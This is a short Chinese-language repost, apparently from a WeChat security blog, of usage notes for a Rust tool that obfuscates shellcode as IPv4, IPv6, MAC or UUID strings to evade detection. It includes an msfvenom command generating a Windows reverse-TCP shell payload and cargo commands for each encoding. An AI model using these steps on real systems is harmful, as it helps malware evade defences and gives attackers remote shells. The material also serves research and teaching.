使用此代码,您可以使用 Ipv4、Ipv6、MAC、UUiD 格式对 shellcode 进行混淆和反混淆。
用途
出于安全原因。我正在删除 payload.bin。你自己生成 .bin...!
例子:
msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin
命令格式
cargo run -- -f <file> -t <technique> -o <operation>
只需运行该程序即可查看用法
cargo run
混淆有效载荷。
cargo run -- -f .payload.bin -t ipv4 -o obfuscate
对payload进行反混淆
cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate
所有用途
混淆命令
使用 IPv4 进行混淆
cargo run -- -f .payload.bin -t ipv4 -o obfuscate
使用 IPv6 进行混淆
cargo run -- -f .payload.bin -t ipv6 -o obfuscate
使用 MAC 进行混淆
cargo run -- -f .payload.bin -t mac -o obfuscate
使用 UUID 进行混淆
cargo run -- -f .payload.bin -t uuid -o obfuscate
反混淆命令
使用 IPv4 进行反混淆
cargo run -- -f .obfuscated_ipv4.txt -t ipv4 -o deobfuscate
使用 IPv6 进行反混淆
cargo run -- -f .obfuscated_ipv6.txt -t ipv6 -o deobfuscate
使用 MAC 进行反混淆
cargo run -- -f .obfuscated_mac.txt -t mac -o deobfuscate
使用 UUID 进行反混淆
cargo run -- -f .obfuscated_uuid.txt -t uuid -o deobfuscate
Shellcode Obfuscation and Deobfuscation Technique
https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation
原文始发于微信公众号(Ots安全):Shellcode 混淆和反混淆技术
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论